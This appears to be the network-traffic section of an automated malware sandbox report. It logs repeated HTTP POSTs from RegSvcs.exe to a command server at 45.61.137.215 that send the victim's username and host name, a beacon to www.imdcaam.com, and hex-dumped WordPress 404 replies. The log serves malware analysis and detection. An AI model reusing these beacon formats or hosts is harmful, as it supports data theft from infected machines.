63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:47.378268003 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:42:47.378283024 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:42:47.378297091 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:42:47.378313065 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:42:47.378329039 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:47.378384113 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:42:47.378400087 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:42:47.378415108 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                                            May 29, 2024 15:42:47.378711939 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.949727216.40.34.41803504C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:46.507601976 CEST169OUTGET /dn03/?KvOx3=URhw1ZwvIctTGCpPzcTqZFryLoAICCIR37RdTq+D27m0Ed9BTUTA8R/QfR+xv6khW63w&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1
                                            Host: www.imdcaam.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.94972845.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:47.538290977 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:47.543272018 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:50.098850965 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:48 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:50.098864079 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:42:50.098875999 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:42:50.099153996 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:42:50.099164009 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:42:50.099183083 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:42:50.099195004 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:50.099205971 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:42:50.099216938 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:42:50.099773884 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.94972945.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:50.288079023 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:50.293190002 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:52.763564110 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:50 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:52.763597012 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:42:52.763607979 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:42:52.763617992 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:42:52.763628960 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:42:52.764004946 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:52.764122963 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:42:52.764133930 CEST1236INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:42:52.764144897 CEST1236INData Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b
                                            Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important
                                            May 29, 2024 15:42:52.764159918 CEST1236INData Raw: 61 63 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79
                                            Data Ascii: ack-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--w


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            16192.168.2.94973045.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:52.927475929 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:52.932425976 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:55.411243916 CEST1236INHTTP/1.0 404 Not Found
